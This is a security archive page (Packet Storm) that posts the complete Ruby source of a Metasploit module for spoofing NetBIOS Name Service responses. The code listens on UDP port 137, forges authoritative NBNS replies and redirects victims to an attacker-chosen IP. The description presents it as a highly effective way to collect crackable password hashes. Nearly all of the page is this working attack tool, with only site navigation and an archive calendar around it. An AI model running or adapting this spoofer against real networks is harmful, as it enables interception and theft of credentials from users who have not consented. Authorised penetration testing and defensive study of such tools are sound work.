what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

NetBIOS Name Service Spoofer

NetBIOS Name Service Spoofer
Posted Aug 31, 2024
Authored by Jay Turla | Site metasploit.com

This Metasploit module forges NetBIOS Name Service (NBNS) responses. It will listen for NBNS requests sent to the local subnets broadcast address and spoof a response, redirecting the querying machine to an IP of the attackers choosing. Combined with auxiliary/server/capture/smb or auxiliary/server/capture/http_ntlm it is a highly effective means of collecting crackable hashes on common networks. This Metasploit module must be run as root and will bind to udp/137 on all interfaces.

tags | exploit, local, root, udp, spoof
SHA-256 | ff6e3182c34b77e4130a88264f526ca39f573748ca673f54fe46407ea6bf712a

NetBIOS Name Service Spoofer

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Capture

attr_accessor :sock, :thread


def initialize
super(
'Name' => 'NetBIOS Name Service Spoofer',
'Description' => %q{
This module forges NetBIOS Name Service (NBNS) responses. It will listen for NBNS requests
sent to the local subnet's broadcast address and spoof a response, redirecting the querying
machine to an IP of the attacker's choosing. Combined with auxiliary/server/capture/smb or
auxiliary/server/capture/http_ntlm it is a highly effective means of collecting crackable hashes on
common networks.

This module must be run as root and will bind to udp/137 on all interfaces.
},
'Author' => [ 'Tim Medin <tim[at]securitywhole.com>' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html' ]
],
'Actions' =>
[
[ 'Service', 'Description' => 'Run NBNS spoofing service' ]
],
'PassiveActions' =>
[
'Service'
],
'DefaultAction' => 'Service'
)

register_options([
OptAddress.new('SPOOFIP', [ true, "IP address with which to poison responses", "127.0.0.1"]),
OptRegexp.new('REGEX', [ true, "Regex applied to the NB Name to determine if spoofed reply is sent", '.*']),
])

deregister_options('RHOST', 'PCAPFILE', 'SNAPLEN', 'FILTER')
self.thread = nil
self.sock = nil
end

def dispatch_request(packet, rhost, src_port)
rhost = ::IPAddr.new(rhost)
# `recvfrom` (on Linux at least) will give us an ipv6/ipv4 mapped
# addr like "::ffff:192.168.0.1" when the interface we're listening
# on has an IPv6 address. Convert it to just the v4 addr
if rhost.ipv4_mapped?
rhost = rhost.native
end

# Convert to string
rhost = rhost.to_s

spoof = ::IPAddr.new(datastore['SPOOFIP'])

return if packet.length == 0

nbnsq_transid = packet[0..1]
nbnsq_flags = packet[2..3]
nbnsq_questions = packet[4..5]
nbnsq_answerrr = packet[6..7]
nbnsq_authorityrr = packet[8..9]
nbnsq_additionalrr = packet[10..11]
nbnsq_name = packet[12..45]
decoded = ""
nbnsq_name.slice(1..-2).each_byte do |c|
decoded << "#{(c - 65).to_s(16)}"
end
nbnsq_decodedname = "#{[decoded].pack('H*')}".strip()
nbnsq_type = packet[46..47]
nbnsq_class = packet[48..49]

return unless nbnsq_decodedname =~ /#{datastore['REGEX'].source}/i

print_good("#{rhost.ljust 16} nbns - #{nbnsq_decodedname} matches regex, responding with #{spoof}")

vprint_status("transid: #{nbnsq_transid.unpack('H4')}")
vprint_status("tlags: #{nbnsq_flags.unpack('B16')}")
vprint_status("questions: #{nbnsq_questions.unpack('n')}")
vprint_status("answerrr: #{nbnsq_answerrr.unpack('n')}")
vprint_status("authorityrr: #{nbnsq_authorityrr.unpack('n')}")
vprint_status("additionalrr: #{nbnsq_additionalrr.unpack('n')}")
vprint_status("name: #{nbnsq_name} #{nbnsq_name.unpack('H34')}")
vprint_status("full name: #{nbnsq_name.slice(1..-2)}")
vprint_status("decoded: #{decoded}")
vprint_status("decoded name: #{nbnsq_decodedname}")
vprint_status("type: #{nbnsq_type.unpack('n')}")
vprint_status("class: #{nbnsq_class.unpack('n')}")

# time to build a response packet - Oh YEAH!
response = nbnsq_transid +
"\x85\x00" + # Flags = response + authoritative + recursion desired +
"\x00\x00" + # Questions = 0
"\x00\x01" + # Answer RRs = 1
"\x00\x00" + # Authority RRs = 0
"\x00\x00" + # Additional RRs = 0
nbnsq_name + # original query name
nbnsq_type + # Type = NB ...whatever that means
nbnsq_class+ # Class = IN
"\x00\x04\x93\xe0" + # TTL = a long ass time
"\x00\x06" + # Datalength = 6
"\x00\x00" + # Flags B-node, unique = whatever that means
spoof.hton

pkt = PacketFu::UDPPacket.new
pkt.ip_saddr = Rex::Socket.source_address(rhost)
pkt.ip_daddr = rhost
pkt.ip_ttl = 255
pkt.udp_sport = 137
pkt.udp_dport = src_port
pkt.payload = response
pkt.recalc

capture_sendto(pkt, rhost)
end

def monitor_socket
while true
rds = [self.sock]
wds = []
eds = [self.sock]

r,_,_ = ::IO.select(rds,wds,eds,0.25)
if (r != nil and r[0] == self.sock)
packet, host, port = self.sock.recvfrom(65535)
dispatch_request(packet, host, port)
end
end
end

def run
check_pcaprub_loaded()
::Socket.do_not_reverse_lookup = true # Mac OS X workaround

# Avoid receiving extraneous traffic on our send socket
open_pcap({'FILTER' => 'ether host f0:f0:f0:f0:f0:f0'})

self.sock = Rex::Socket.create_udp(
'LocalHost' => "0.0.0.0",
'LocalPort' => 137,
'Context' => { 'Msf' => framework, 'MsfExploit' => self }
)
add_socket(self.sock)
self.sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1)

self.thread = Rex::ThreadFactory.spawn("NBNSServerMonitor", false) {
begin
monitor_socket
rescue ::Interrupt
raise $!
rescue ::Exception
print_error("Error: #{$!.class} #{$!} #{$!.backtrace}")
end
}

print_status("NBNS Spoofer started. Listening for NBNS requests with REGEX \"#{datastore['REGEX'].source}\" ...")

self.thread.join
print_status("NBNS Monitor thread exited...")
end

def cleanup
if self.thread and self.thread.alive?
self.thread.kill
self.thread = nil
end
self.sock.close
close_pcap
end
end
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close